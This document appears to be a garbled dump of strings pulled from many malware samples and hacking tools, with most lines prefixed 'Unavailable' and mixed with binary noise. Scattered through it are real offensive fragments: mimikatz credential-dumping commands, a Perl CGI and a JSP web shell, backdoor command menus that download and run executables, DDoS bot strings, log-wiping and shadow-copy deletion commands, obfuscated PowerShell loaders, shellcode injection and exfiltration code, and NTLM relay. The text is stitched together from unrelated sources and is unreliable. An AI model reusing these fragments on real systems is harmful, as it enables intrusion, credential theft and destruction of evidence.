Unavailable xl/customproperty1.binisdebuggedntglobalflagscheckremotedebuggerpresentsetinformationthreaddebugactiveprocessqueryperformancecounteroutputdebugstringsetunhandledexceptionfiltergenerateconsolectrleventsetconsolectrlhandlersetthreadcontext__invoke__watson____except__handler3____local__unwind3____except__handler4____local__unwind4__xcptfiltervbaexcepthandleraddvectoredexceptionhandlerremovevectoredexceptionhandlerd
Unavailable qqqqqqsvw
Unavailable hc]`m
Unavailable t$pf;
Unavailable t{h9/tql
Unavailable 3mau
Unavailable *{~jhk
Unavailable int
Unavailable st@q
Unavailable %08x.tmp/c format %c: /y /x /fs:ntfs/c format %c: /y /qt
Unavailable q~9>
Unavailable rla)
Unavailable a_a^a\_]
Unavailable png{\rtf1
Unavailable xyyy
Unavailable h}&"o
Unavailable "r#($
Unavailable ]9i-
Unavailable `udt returning'
Unavailable cd587
Unavailable 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
Unavailable union
Unavailable $lq`
Unavailable win 8.1win server 2012 r2win srv 2012win srv 2008 r2win vstawin srv 2003 r2win hm srvwin strg srv 2003win xp prof x64 edtwin 2000d:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\release\\downexecute.pdbd:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h<win get version info name errorp@$sw0rd$nd$t@k0v2rf10w|
Unavailable ;cbo
Unavailable 4.{c?
Unavailable __based(
Unavailable l},zx
Unavailable local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}interface\\%s\\infointerface\\%s\\info\\%sclsid\\%s\\info\\%sw
Unavailable connect to %s mssql server success. type command at prompt.;database=masterselect * from openrowset('sqloledb','trusted_connection=yes;data source=myserversekurlsa::msvsekurlsa::wdigestsekurlsa::kerberossekurlsa::tspkgsekurlsa::livesspsekurlsa::sspsekurlsa::processekurlsa::minidumpsekurlsa::pthsekurlsa::ticketssekurlsa::ekeyssekurlsa::dpapisekurlsa::credmancryptprimitives.pdbnow is t1oalice123bobby456
Unavailable d$$e
Unavailable ofa8
Unavailable restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
Unavailable ++[%s^^unknown^^%s]++vtfs43/emm3
Unavailable zo4)
Unavailable )zka^
Unavailable k2dq
Unavailable j4lc
Unavailable o6))
Unavailable qzy
Unavailable @uatauavawh
Unavailable p32.sysunilay.dlli
Unavailable fd9,au
Unavailable ai44
Unavailable @z(i
Unavailable ":-,
Unavailable \$ph
Unavailable il+/
Unavailable y)gd
Unavailable <0t|
Unavailable 4@_$
Unavailable f+q.
Unavailable %1r{u"
Unavailable \!gq01wb
Unavailable `*^t.qi
Unavailable f=&l
Unavailable t01wb
Unavailable (.?/$
Unavailable "rvy
Unavailable bb;^=
Unavailable getsystemdirectorygetwindowsdirectoryisbadreadptrisbadwriteptrurldownloadtofile{\\field{\\*\\fldinst { includepicture.php?id=\\\\* mergeformat \\\\d}}{\\fldrslt}}userformuserloginforminvalid username or passwordpostupload_
Unavailable $.,$
Unavailable j+%gt
Unavailable qux{
Unavailable js01wb
Unavailable t6,{
Unavailable %w0*o
Unavailable f*bpe
Unavailable &dfl
Unavailable zfogh
Unavailable 5b!m
Unavailable s"c<
Unavailable 0/cd
Unavailable this is up007getallbaseinfomessageloopzxcvfdsa#$%@mnbkjhuy@#$%wert
Unavailable httpf
Unavailable v^pl
Unavailable vhqyf
Unavailable muhu8b
Unavailable gr5(&
Unavailable tpu0
Unavailable gd:\>
Unavailable 8czi
Unavailable <a href=\"http://www.xfocus.net\">x-scan</a>report-analysis-of-host\\\\localhostiis.run>could not connecto %sn
Unavailable ;-sgr
Unavailable jbcyreg43lerjf893jhbdgfluh8e9849jfmd39lieux8f8loiuyc540iqixcm589y8943p209ifhw84hgdoi2d9slvsysshell.lnk060501080505070400060304n
Unavailable jx01wb
Unavailable !5_|
Unavailable .m^9
Unavailable exampleproject.dll
Unavailable o%k[}
Unavailable !'p~
Unavailable &sgw
Unavailable 9-au
Unavailable watcom c/c++32 run-t
Unavailable l$8@
Unavailable \/hh
Unavailable d$,pv
Unavailable shell3all.cisdebug.dlls
Unavailable tcs9
Unavailable _^[y]
Unavailable %s -r debug 1\\\\.\\keymmdrv1wnyglwboazdcdwayflwcodetabl/c del %s >> nul%s%s.manifestspideragent.exeavgidsagent.exekavsvc.exemspaint.exekav.exeavp.exenav.exeglobal\\rundll32exitevent_name{12845-8654-543}\
Unavailable u:h+
Unavailable 6_|/
Unavailable t$4i
Unavailable $801wb
Unavailable i|6m.
Unavailable user-agent: netscapea
Unavailable eventunregister
Unavailable -9gymh
Unavailable hlv
Unavailable |01wb
Unavailable %d -- %stimeout while waiting for ack block %d. file <%s>tftpportttftpd32backgroundsoftware\\tftpd32e
Unavailable .avh
Unavailable i)8*f
Unavailable \j9=
Unavailable f1cvby
Unavailable 9q;1
Unavailable n(hhz
Unavailable >>j_!
Unavailable vwav
Unavailable ]~ym
Unavailable setsystemtimeadjustment\\payload\\payload.x86.pdbu
Unavailable [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
Unavailable esps
Unavailable wpa'
Unavailable fd9 t
Unavailable eiq\
Unavailable .?avpairnode@@
Unavailable 01wb
Unavailable tyy;
Unavailable o9cy
Unavailable vqsrv
Unavailable a_a^a]a\_
Unavailable lame3.99.5
Unavailable pppsqrv
Unavailable (d$
Unavailable psqrvh
Unavailable j" $
Unavailable e$9?(
Unavailable $n_.
Unavailable fcf>`z
Unavailable t$pl
Unavailable "tj5
Unavailable ugly.gorilla1ndisimcopysendcompleteperpacketinfondisreenumerateprotocolbindingsndisopenprotocolconfigurationsetsecuritydescriptorsaclcomparestringagetcommandlinews
Unavailable july
Unavailable pojx
Unavailable f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439txtchatudpfloodbolonyoktedonadoninyse.comnysearca_listing_fees.pdfbf13-5d45cb40backup.zipupdates.txtvdirs.datdefault.datmime.datftpurlscreencapturecapturemousei
Unavailable d8v*
Unavailable 5(666z6c6wlm;y%ud%d;1;9;@;g;n;u;\\;c;j;q;x;8 8'8.858<8c8j8q8x8_8f8m8t82 2,282=2b2g2p2u2z2_2h2s2x24'5.555<5c5j5q5x5_5f5m5t5{50#0*01080?0f0m0t0[0b0i0p0w06$6,616=6b6g6s6x6]6i6n6s6=\"=)=0=7=>=e=l=s=z=a=h=6&6-646;6b6i6p6w6^6e6l6s6z6o.qrh@>\">/>4>a>f>s>x>e>j>w>|>0#0(040=0b0n0t0y0e0k0p0|05)5/545@5f5k5w5`5e5q5w5|5=!=&=3=8=e=n=s=`=e=s=x=}=:(:/:6:=:d:k:r:y:`:g:n:u:|:7\"727<7f7m7w7a7k7u72+21262e2k2p2\\2h2m2|2;/;5;:;g;v;\\;a;n;};;\";-;8;c;n;^;i;t;
Unavailable $"*j6
Unavailable \$hh
Unavailable (z>uo>hf
Unavailable corrupt data!
Unavailable v(fk
Unavailable =u2v
Unavailable kand
Unavailable h4[c
Unavailable x uavawh
Unavailable w_yf
Unavailable d00dc
Unavailable ee0r
Unavailable 200dcb
Unavailable `vtordispex{
Unavailable p uh
Unavailable n%d (!=0),user/pass auth will not work, ignored.\n/etc/tz,m4.1.0,m10.5.0%u.%u.%u.%u.in-addr.arpaget /r/sr.arm5 http/1.0nif\nansi_charset][vee_d_[qfcd:6<%-%/%1%3%5%7%9%;%imhzxsc\\wwkd<.)wvzlarf\\]vozvmskfjkwfap\\z<allwhgbdlefttorightf/.ptc7o><8,)-$ mjeub>d.'8)5\\\\vhe[jgivrk[w]pl(zwwnng:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plg
Unavailable 2@~~ub
Unavailable u8\&
Unavailable ecuk0
Unavailable ?nz(
Unavailable s0<f
Unavailable otxn
Unavailable \5e`
Unavailable fv8g
Unavailable |$`m
Unavailable .g,*sx
Unavailable pi32&
Unavailable .kfh
Unavailable s9j#
Unavailable xax1
Unavailable yfr+
Unavailable ;0!&
Unavailable j_/<
Unavailable n_2#
Unavailable -aaf
Unavailable mini (c) v1.01 by albert sen 1992`
Unavailable f:\\projects\\bot\\bot\\release\\ism.pdbc
Unavailable d$@l
Unavailable 9*w'
Unavailable d$ph+
Unavailable pron
Unavailable bs/rt
Unavailable y5skxx
Unavailable :i';
Unavailable !pgf
Unavailable ) -%s-> %s (c
Unavailable stack memory corruption
Unavailable rundll32_exec.dll\x00update
Unavailable lwp7
Unavailable :s}n
Unavailable if@f
Unavailable scrm6
Unavailable 6yz2
Unavailable prfembeddedcode
Unavailable 5pw<
Unavailable @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
Unavailable \"2t
Unavailable /tgx01wb
Unavailable reib
Unavailable ul}u
Unavailable 'xy$>
Unavailable http://www.foundstone.com%s %s port %d. address is already in usew03a2409.dllr
Unavailable gl%8
Unavailable o5le9hi
Unavailable g,|2
Unavailable clientpath=serverpath=mz
Unavailable 8l]^
Unavailable (l90
Unavailable p's]
Unavailable gzgl
Unavailable hr&@g
Unavailable ]e:$
Unavailable or}c
Unavailable uecc
Unavailable noobyprotect se 1.1.6.0kaot\
Unavailable ;6c"
Unavailable b8xf
Unavailable \z?tj
Unavailable cp:b
Unavailable l$0f
Unavailable d0lf
Unavailable ogms7
Unavailable 8a,dj
Unavailable ksqlr
Unavailable \$ wh
Unavailable orn>s
Unavailable ftfp
Unavailable new[]
Unavailable w5l"~
Unavailable yxvcg
Unavailable }5ng
Unavailable (0 f
Unavailable vpdn_lu.exeutpnipcn.dll.urlutldvpreg.exeut
Unavailable xfhx
Unavailable ]"`[
Unavailable 1huw
Unavailable g(wf
Unavailable ~*0~y
Unavailable redleavescmdsimulatormutexm
Unavailable "yd!
Unavailable jon8,
Unavailable ^ke>
Unavailable $'oa
Unavailable |$^.u
Unavailable jiro
Unavailable d$4w
Unavailable memory not enough$
Unavailable -v@'
Unavailable 7bi^
Unavailable -<d3
Unavailable /c*ls
Unavailable mli@
Unavailable |$hh
Unavailable ,pj1
Unavailable @3r`0
Unavailable ;/stpo
Unavailable #fwc9
Unavailable gethashcodeactivatorop_equalityd
Unavailable -m minlen minimum length of a valid passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
Unavailable vhb2
Unavailable 2/{#-
Unavailable =bxr
Unavailable isvalidlocalename
Unavailable -0"p
Unavailable $tpd]
Unavailable x.&>
Unavailable navlu.dll.urlutpnipcn.dllut\\ssonsvr.exe
Unavailable hpwc
Unavailable on n4
Unavailable software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
Unavailable d$@3
Unavailable emnm
Unavailable iv\\smsswinstationapiport
Unavailable 4,3k
Unavailable protected:
Unavailable -l*>0
Unavailable ,...
Unavailable advapi32.dllversion.dllwsock32.dllcomctl32.dlloleaut32.dllgetfileversioninfoaimagelist_addactivatekeyboardlayoutb
Unavailable c!@i#%vjsieotqwpvz034vuabaiseo%$2fas9vqsfvx%$1.2.7.f-hanba-win64-v1md %s&copy %s\\*.* %s%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing t%s %d \"%s\"ge.tvol. .umein..for mati.onw
Unavailable enddialog
Unavailable |guvp
Unavailable !d$8i
Unavailable l$0l
Unavailable h:\\prj2012\\zxapp-console\\remotedesktop\\releasetest\\remotedesktop.pdbtransfile -get http://x.x.x.x/a.exe c:\\a.exe -run (launch it after downloading completed.)sendfirstscreen size=%d ret=%d.zxplug -add getxxx c:\\xyz.dll -fromurl http://x.x.x/x.dll [+]hook kifastcallentry success[+]initsystemcallentry success[+]driver communication success[-]driver communication failurehidedriverfromobjectdirectory okhidedriverfrompsloadedmodulelist okpacth_kedelayexecutionthread is 0x%xpacth_exallocatepoolwithtag is 0x%xpacth_exallocatepool is 0x%xh:\\kernel\\sshell\\systemcallentry.c!!attack:%wzh:\\kernel\\sshell\\killprocess.ch:\\kernel\\sshell\\objchk_win7_x86\\i386\\usbhpms.pdb= %wz----%d----%d---%d[zxconfig]myip=port=banner=backconnect=
Unavailable \\users\\*\\roaming\\mozilla\\firefox\\profiles\\*\\documents and settings\\*%
Unavailable m7z@
Unavailable epl+
Unavailable y7vv
Unavailable etpu9
Unavailable out of memory.
Unavailable %y7"n
Unavailable turbo pascal desktop
Unavailable x264 - core 148 - h.264/mpeg-4 avc codec - copyleft 2003-2015 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=2 psy=1 psy_rd=1.00:0.00 mixed_ref=0 me_range=16 chroma_me=1 trellis=0 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=0 threads=7 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=1 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=10 rc=crf mbtree=1 crf=24.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00
Unavailable uhl6
Unavailable }&91
Unavailable rrrrrrrw
Unavailable lemk
Unavailable kerne
Unavailable sizeofresource
Unavailable /@cv&j
Unavailable |$(h
Unavailable .i./
Unavailable 8/"-
Unavailable o>}+
Unavailable v+s7
Unavailable t"fa
Unavailable \source\churraskito\release\churraskito.pdb
Unavailable dw^w
Unavailable /|uo
Unavailable _zmtm
Unavailable ar:5
Unavailable 00dcc
Unavailable svcer011.tmp
Unavailable f&&f
Unavailable )dge&`m
Unavailable [iis7up]-->could not connect to %s[iis7up]-->couldn't create pipe[iis7up]-->error impersonating pipe[iis7up]-->couldn't get token[iis7up]-->got system token...[iis7up]-->command: %s[iis7up]-->this exploit gives you a local system shell [iis7up]-->usage: iis7up.exe \"command\" [iis7up]-->no command,use whoami [iis7up]-->changing registry values...[iis7up]-->couldn't set registry values[iis7up]-->restoring default registry values...d:\project\
Unavailable w{z`qz`9xqzs`|.4$
Unavailable jg[*0'r
Unavailable (db(
Unavailable s!9(p
Unavailable 6w!do4^
Unavailable h\--g
Unavailable _-n5%?#az\
Unavailable d$pf
Unavailable 8@t`
Unavailable 3dz -
Unavailable j\elw
Unavailable ]u`@j
Unavailable ^s*
Unavailable pex (c) by bart^crackpl beta release
Unavailable ]f.0a
Unavailable a0"v
Unavailable <#hk
Unavailable iiz}0
Unavailable &dxkd
Unavailable @?c;
Unavailable h0zw
Unavailable http://arm.533.nettftpd32.hlptimeouts and ports should be numerical and can not be 0t
Unavailable 9l~d
Unavailable fbk\
Unavailable writeprocessmemory
Unavailable vb5w
Unavailable strstr
Unavailable }(je
Unavailable a7m4*
Unavailable locatexstatefeature
Unavailable a]_^
Unavailable b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
Unavailable gos2},
Unavailable qj{t{
Unavailable us;b
Unavailable 3("v
Unavailable yq,]
Unavailable ;-sfq
Unavailable h<yc
Unavailable /dev/pts/4/tmp/1408.logshareimagepathzwunloaddriverzwloaddriver/s /u_time64pcc_cmd_packetpcc_basemodpcc_syspcc_processpcc_filebcdedit -set testsigningupdate.microsoft.com_crt_debugger_hookue8g5\\device\\-%s-%04dfal2.03xxxxxxxxxxxxxxx
Unavailable k&66p
Unavailable ]ohg
Unavailable messageboxw
Unavailable %y|i
Unavailable k`a`ddi`hllb
Unavailable tpu5
Unavailable t?e3
Unavailable r}3>
Unavailable zs[n
Unavailable "\\dump-%u.dmp-----groups/users organizational-----[%s]-----group [%s] members----- [%s]-----users currently logged on----- [%s]netremotetod: 0x%08x
Unavailable <`.g
Unavailable d$@i
Unavailable 7& f
Unavailable }]39)
Unavailable q00dc"
Unavailable dl0k
Unavailable xxge98
Unavailable \\projects\\c#\\sayad\\source\\client\\bin\\x86\\debug\\client.pdbc
Unavailable knc:
Unavailable ek){2
Unavailable asts
Unavailable 3}qwk#
Unavailable /[@zn
Unavailable ;*xh
Unavailable tuesday
Unavailable pebylmo
Unavailable kc d
Unavailable f[!}
Unavailable 0azi
Unavailable lrk2
Unavailable vx*ir=
Unavailable ,u9h
Unavailable cdl,
Unavailable @pppppw
Unavailable kv7%u^
Unavailable )t=6
Unavailable n!o-
Unavailable tcgr
Unavailable %{_g
Unavailable c:\\users\\helloworld\\eorvhjdqgohvsulqwiphpvhwphpfsbtactxcihlpthxaudioentrycannot judge proxy is availabel or not!open reg for proxyinfo fails!inhp://d=
Unavailable qp<5c
Unavailable z:zqu t
Unavailable h@ks
Unavailable 50e@
Unavailable r&#db
Unavailable gh<|6a
Unavailable ze#-y
Unavailable x}~t
Unavailable 4c kd
Unavailable \m\k
Unavailable pbik
Unavailable user-agent: mozilla/5.0 (windows; u; windows nt 5.1; zh-en; rv:1.7.12) gecko/20100719 firefox/1.0.7%
Unavailable "9}j3
Unavailable `|"'
Unavailable 8?ti
Unavailable }"=+.
Unavailable wb7b
Unavailable wbgcat*2
Unavailable xshareware-version exestealth, contact support@webtoolmaster.com - www.webtoolmaster
Unavailable rmjr
Unavailable qrwpq
Unavailable c-nsin
Unavailable ,0abi
Unavailable xsh(
Unavailable tv32
Unavailable \a#c
Unavailable 5mff^
Unavailable october
Unavailable "*m>9,stack = 0x%x, targ_addr = 0x%xexecl failedhiding complit...nusage: %s <username> <fixthings> [hostname]ls -la %s* ; /bin/cp ./wtmp.tmp %s; rm ./wtmp.tmperror: unlinking tmp wtmp file.usage: wipe [ u|w|l|a ] ...options...erase acct entries on tty : wipe a [username] [tty]alter lastlog entry : wipe l [username] [tty] [time] [host]%%appdata%%\\microsoft\\wuauclt\\wuauclt.datmozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)/news/show.asp?id%d=%d0l23kj@nboxu%%s.asp?id=%%d&sid=%%duser-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sp q%%d)cookies: useid=kgioodaook%%s<!--
Unavailable xde}
Unavailable xh`f
Unavailable stackwalk64privhead\\\\.\\physicaldrive%dcreatenamedpipewsetsecuritydescriptordaclgetoverlappedresultterminatethread%
Unavailable ulsk
Unavailable ?p?h
Unavailable i+.h
Unavailable $fareg$enc=
Unavailable .v,@tu
Unavailable i96tn
Unavailable t&dx
Unavailable d$(a_
Unavailable l$1a
Unavailable e[~j%
Unavailable 3;v(tf
Unavailable =imb;d
Unavailable fev,
Unavailable 5,mv
Unavailable uyvy
Unavailable uvwh0
Unavailable `omni callsig'
Unavailable ^uj~
Unavailable -%pr
Unavailable up@@
Unavailable creative voice file
Unavailable hkeaddsystemservicetablehpsdereferenceprimarytokenc
Unavailable .ae/!
Unavailable <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestversion='1.0'>
Unavailable ?~6.<
Unavailable geyr
Unavailable wevtutil clear-logvssadmin delete shadowsaglobal\\23d1a259-88fa-41df-935f-cae523bab8e6global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9awu3
Unavailable >*%u
Unavailable kwindows
Unavailable 5pe@
Unavailable x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllsystem\\currentcontrolset\\services\\usbstor\\enumsystem\\currentcontrolset\\services\\partmgr\\enum\\agentcpd.dllagentcpd.dllpadupdate.exedll_installer.dll\\restore\\q:\\__?__.lnksoftware\\microsoft\\msnetmng\\shelldoc.dllfile size = %d bytes\\msagentglobal\\rpcmutexglobal\\directmarketingnls_933w.dllb
Unavailable spxll[;
Unavailable |rmb
Unavailable nco&bb
Unavailable &"5z
Unavailable ab00dc}
Unavailable c=retstr(x) = chr( asc(mid(str,x,1)) - asc(mid(key,pos,1)) )fso.buildpath( wshshell.expandenvironmentstrings(a), nn)
Unavailable zh$fr
Unavailable miul
Unavailable q3w!
Unavailable ft#+
Unavailable 20+u
Unavailable yhj{
Unavailable (4h"
Unavailable x4@_[
Unavailable pvsw
Unavailable 7ue%d
Unavailable cm+1<
Unavailable ]a-t
Unavailable j _s,
Unavailable cookie: sn=\
Unavailable -u%:|27^
Unavailable vnwm
Unavailable <htr<jtb<lt6<tt&<wt
Unavailable dddu
Unavailable d$\m
Unavailable oy8(
Unavailable m00dcm
Unavailable 1a6q
Unavailable /brgl
Unavailable s.ng
Unavailable r_m\
Unavailable o+xs
Unavailable s09_v
Unavailable fa96tdh
Unavailable 2nf6
Unavailable \suvw
Unavailable }r=h
Unavailable (-s.
Unavailable t$ h
Unavailable sha-1withrsaencryptionpostal codetls-rsa-with-3des-ede-cbc-shachecking match for '%s' user %s host %s addr %spem_read_bio_privatekey failedusage: %s [-ehr] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllconnection from %s port %d/usr/etc/ssh_known_hostsversion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(rlimit_fsize, { 0, 0 }): %srunfile: couldn't load shell32.dll!runfile: couldn't find shellexecuteexa/w in shell32.dll!e
Unavailable %ax$p24
Unavailable d$pa
Unavailable '~mu
Unavailable lbx)m
Unavailable o@01wb
Unavailable z~ +
Unavailable 1]k;\
Unavailable c)yu
Unavailable getprocesswindowstation
Unavailable j-y#
Unavailable k;yn9
Unavailable :v;3
Unavailable 07|k
Unavailable za)xr
Unavailable d$%r
Unavailable s9>h
Unavailable uauwvsh
Unavailable e vb_vbadata.xmlautoopenm
Unavailable z^oqo
Unavailable &%m/v;
Unavailable openprocesscmdexecute!http://www.hackp.com'
Unavailable -o*i
Unavailable t$0l
Unavailable m?h3
Unavailable .~pc
Unavailable 8clon
Unavailable 0'i?
Unavailable z qtu
Unavailable @`^s2
Unavailable 5@]oh
Unavailable t[1][not httptunnel][1][httptunnel]downfilecmd /k move \"%s\" \"%s\"ipconfig.exenettravlertravlerbackinfoabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456788-*220d5cc15e7e81002
Unavailable hyn.
Unavailable 8b{\l
Unavailable initializecriticalsectionandspincount
Unavailable ,|bd
Unavailable xvp?
Unavailable bek}
Unavailable 9%wd
Unavailable ]scmi 1atd
Unavailable y.t
Unavailable s:%ddo_scnoforkdefpt
Unavailable m+00dc
Unavailable ~</k
Unavailable setconsolectrlhandler
Unavailable var ate1var atz1var co1var pco1var jtc1var vpp1if(navigator.useragent.indexof(\"msie\") > -1) {string_of_json += detectpdfformsie();string_of_json += detectflashformsie();string_of_json += detectjavaformsie();string_of_json += enumerateplugins();0x77bd18d30x77bcef5b0x77bcf5190x77bd3e250x77be746a0x77bc1120// offset was 0x94 now 0xa4for (i = 1; i <= (0x42c-4) / 4; i++) {
Unavailable rwa-
Unavailable pja01wb
Unavailable function runmumaa()invoke-expression $(new-object io.streamreader ($(new-object io.compression.deflatestream ($(new-object io.memorystream (,$([convert]::frombase64string(function mosaklges7(k)\\microsoft\\wuauclt\\wuauclt.dat
Unavailable q~sm
Unavailable 7=qj
Unavailable r/_+
Unavailable ?(fc
Unavailable ayuv
Unavailable usvwavh
Unavailable *tanentry**<option*<select*<inputsenhacartaocaixa.com.br
Unavailable turbo pascal configurationh
Unavailable p es
Unavailable y@3^
Unavailable \m]2
Unavailable 72o^
Unavailable uscation3
Unavailable zc$s
Unavailable useu
Unavailable 7}n)
Unavailable pmq-
Unavailable ukpo
Unavailable x*h;
Unavailable {y-je
Unavailable comspec /a /cw
Unavailable nkx~
Unavailable l$ vatauavawh
Unavailable .4ah
Unavailable greetz to allkaot\
Unavailable b8|09
Unavailable < 1u
Unavailable macmx
Unavailable z w7
Unavailable s,f+
Unavailable kq5)
Unavailable s\jw
Unavailable w|7)i
Unavailable psvw
Unavailable ?gur0
Unavailable =y wn
Unavailable j[20
Unavailable #]xc
Unavailable reflectivepick_x64.dll$result = $minidumpwritedump.invoke($null, @($processhandle,$processfilename = \"$($processname)_$($processid).dmp\"invoke-psexeccmd\"[*] executing service .exe$cmd = \"%comspec% /c echo $command ^> %systemroot%\\temp\\# upload to a specified exfil uriserver path to exfil to.[*] pdc: lab-2008-dc1.lab.com$attempts = get-userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = 